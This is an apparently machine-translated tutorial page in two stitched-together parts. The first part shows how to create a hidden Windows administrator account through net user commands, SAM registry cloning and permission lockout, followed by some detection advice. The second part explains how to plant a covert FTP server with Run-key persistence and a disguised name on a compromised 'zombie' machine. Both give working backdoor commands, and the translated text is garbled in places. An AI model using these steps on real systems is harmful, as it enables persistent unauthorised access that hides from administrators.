Hidden Administrator Account

Source: Internet
Author: User

Where the user list is displayed:

1. Control Panel-user management

2. Computer Management-local users and groups

3. UseNet user

4. If you do not use the traditional interface during XP boot, The system will list all non-default users of the current system

5. My computer

 

This has already involved hackers. Here I will only show you how to hide an account. As for folders, you can simply set them as hidden attributes. I. Conspiracy in "command prompt"
Click Start> Run, Enter cmd to run the command prompt, enter net user Piao $123456/Add, and press Enter, "Command completed successfully" is displayed ". Enter "net localgroup administrators Piao $/Add" and press Enter. Then, we can use the "command prompt" to create a username named "Piao $ ", A simple "hidden account" with a password of "123456" and elevated the hidden account to administrator permissions.
This method can only hide the account in the "command prompt", but it is powerless for "Computer Management. Therefore, this method of hiding accounts is not very practical. It is only valid for careless administrators. It is an entry-level system account hiding technology. 2. Hide accounts in the Registry
Is there any technology that can hide accounts at the same time in "command prompt" and "Computer Management? The answer is yes, and all this requires a small setup in the registry, so that the system account can completely evaporate in the two. 1. Return to the peak, and grant the Administrator the registry operation permission to operate the key value of the system account in the registry. You need to modify the key value in "hkey_local_machinesamsam", but when we come here, you cannot expand the key value. This is because the system gives the system administrator the "Write DAC" and "read control" permissions by default, and does not grant the modification permission, therefore, we cannot view and modify the key values under "Sam. However, you can use another Registry Editor in the system to grant the Administrator the modification permission.
). Go to "HKEY_LOCAL_MACHINE \ SAM" in regedt32.exe, click "security" menu> "permission", and select the "Administrators" account in the pop-up "SAM Permissions" edit window, select "full control" in the permission settings section below, and click "OK. Then we switch back to the Registry Editor, and we can see that the key values under "HKEY_LOCAL_MACHINE \ SAM" can be expanded.
Tip: the method mentioned above applies only to Windows NT/2000 systems. In Windows XP, you can perform permission operations directly in the registry. You can right-click the item you want to set the permission and select "permission. 2. Steal the bar and replace the hidden account with the administrator.
After obtaining the registry operation permission, you can start to hide the creation of an account. Go to "HKEY_LOCAL_MACHINE \ SAM \ Domains \ ACCOUNT \ Users \ names" in the Registry Editor. All existing accounts in the current system will be displayed here, including our hidden accounts. Click "Piao $", and the "type" item in the key value displayed on the right is 0x3e9, go up to "HKEY_LOCAL_MACHINE \ SAM \ Domains \ ACCOUNT \ Users \" and find the "000003e9" item, which corresponds to each other, all information about the hidden account "Piao $" is included in "000003e9. Similarly, we can find that the corresponding item of the "Administrator" account is "000001f4 ". Export the key value of "Piao $" to "Piao $. reg, and export the f key values of "000003e9" and "000001f4" to user respectively. reg, admin. reg. Use NotePad to open Admin. Reg, copy the content following the "f" value, replace the "f" value in user. Reg, and save it. Next, go to the "command prompt" and enter "Net user Piao $/del" to delete the hidden account we created. Finally, import Piao $. Reg and user. reg to the Registry. At this point, the Account creation is completed. 3. crossing the river to split the bridge and cut off the ways to delete hidden accounts
Although our hidden accounts have been hidden in "command prompt" and "Computer Management", experienced system administrators may still use the Registry Editor to delete our hidden accounts, so how can we make our hidden accounts rock solid?
Open “regedt32.exe and go to "hkey_local_machinesamsam". Set the permissions of "Sam" and cancel all permissions of "Administrators. Again. This way, even if an inexperienced administrator finds a hidden account in the system, the Administrator is helpless. Iii. Dedicated tools to hide your account in one step
Modifying the registry is risky and cumbersome for new users. In this case, you can use the tool "hideadmin" to download it and decompress it to drive C. Run "command prompt" and enter "hideadmin Piao $123456". If "Create a hiden administrator Piao $ successed!" is displayed !", It indicates that a hidden account named Piao $ with a password of 123456 has been successfully created. Using this tool, the account hiding effect is the same as modifying the registry in the previous article. 4. Apply "hidden account" to the System
The danger of hiding an account is enormous. Therefore, it is necessary for us to understand the account hiding technology and then to understand the corresponding defense technology, so that we can thoroughly ask the hidden account out of the system.
1. Add a "$" symbol to hide an account
It is relatively simple to detect such hidden accounts. After using this method to create a hidden account, hackers generally escalate the hidden account to administrator privileges. Then, you only need to enter "net localgroup Administrators" in the "command prompt" to make all the hidden accounts visible. If it is too troublesome, open "Computer Management" to view it. The account with the "$" symbol added cannot be hidden here.
2. Modify the Registry-type hidden account
Because the account hidden in this way is not seen in "command prompt" and "Computer Management", you can delete the hidden account in the registry. Go to "hkey_local_machinesamsamdomainsaccountusersnames" and compare the existing accounts with those in "Computer Management". The hidden accounts are hidden accounts. It is also easy to delete it. Simply delete an item named after an account to hide it.
3. A hidden account with a name cannot be seen
If a hacker creates a hidden account that modifies the registry, the Administrator's permission to operate the registry is deleted. The Administrator cannot delete the hidden account through the registry, or even cannot know the name of the hidden account created by the hacker. However, there is no such thing as this. We can use the help of "group policy" to prevent hackers from logging in through hidden accounts. Click Start> Run and enter gpedit. MSC "runs" Group Policy ", expands" Computer Configuration ">" Windows Settings ">" Security Settings ">" Local Policies ">" audit policies ", double-click "review policy change" on the right side, select "successful" in the pop-up setting window, and then "OK ". Perform the same settings for "Audit Login Events" and "Audit Process Tracking.
After you enable the logon event review function, you can log on to any account, including hiding accounts, in this way, we can use the "Event Viewer" in "Computer Management" to accurately learn the name of the hidden account, and even the time when hackers log on. Even if a hacker deletes all login logs, the system will record which account has deleted the system logs, so that the hacker's hidden accounts will be exposed.
You can use the Event Viewer to find the hidden account and find the name of the hidden account. However, we still cannot delete this hidden account because we do not have the permission. However, you can enter "Net user hide account name 654321" in the "command prompt" to change the password of this hidden account. In this way, the hidden account becomes invalid and hackers cannot log on to the hidden account. Slimftp2 usage !!!

Here, I assume that you have obtained a shell with administrator or system permissions, which is required for installation.
Installation Steps: the installation steps include local settings and server settings.
Local Settings: Place all the files attached to this document in a folder. Here is D: \ ftp. then run adminftp.exe. The running window is divided into three parts: the server parameter settings at the top, the user account settings at the bottom left, and the Access Directory settings at the bottom right.
To set server parameters, you only need to set the server port (server port). Because the server usually runs an FTP server, let's change the port to a different one. Here I set port 3323, and the other two parameters are not needed. Then, we add another user, click New, enter a user name root, select the user, and enter a password nopass. Finally, enter a path c: \ on localroot, which serves as the root directory of the root user. Click new and enter/in the pop-up window, hook up all the following four permissions. The read permission allows users to download files, write permission allows users to upload files, list permission allows users to view the directory list, admin permission allows users to re-command and delete files on the FTP server. You can create multiple users as needed.
Go to the command line, switch the directory to D: \ FTP, and enter Reg export "HKLM \ SOFTWARE \ whitsoft development" ftp. Reg. Now all local operations have been completed.
Remote Operation: Copy F tp.reg1_slimftp2.exe1_reg.exeto the system directory of the zombie (usually
C: \ winnt \ *** 32, if not exist. Run again
Reg import f tp. Reg
Reg add HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run/V winsock2up/d slimftp2.exe
Copy slimftp2.exe % ***** root % \ ***** 32
Slimftp2.exe
When you run copy slimftp2.exe % ***** root % \ *****, an error is displayed. This is because slimftp2.exe is already in the system directory. Finally, delete f tp. Reg!
Well, everything is done, even if the zombie restarts our FTP server, it will still run.
However, the port on this server is a bit special. How can we access it?
If it is to use IE, so the input is good f TP: // root: nopass@192.168.0.1: 3323/replace 192.168.0.1 with the IP address of your server. Under DoS
What about FTP? This way!
FTP
Open 192.168.0.1 3323
Root
Nopass

Note: You can change the slimftp2.exe file name and service port, but the corresponding step input should also be changed.
For example, if I change slimftp2.exeto wsockup.exe,
Reg add HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run/V winsock2up/d slimftp2.exe
It should be changed
Reg add HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run/V winsock2up/d wsockup.exe

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.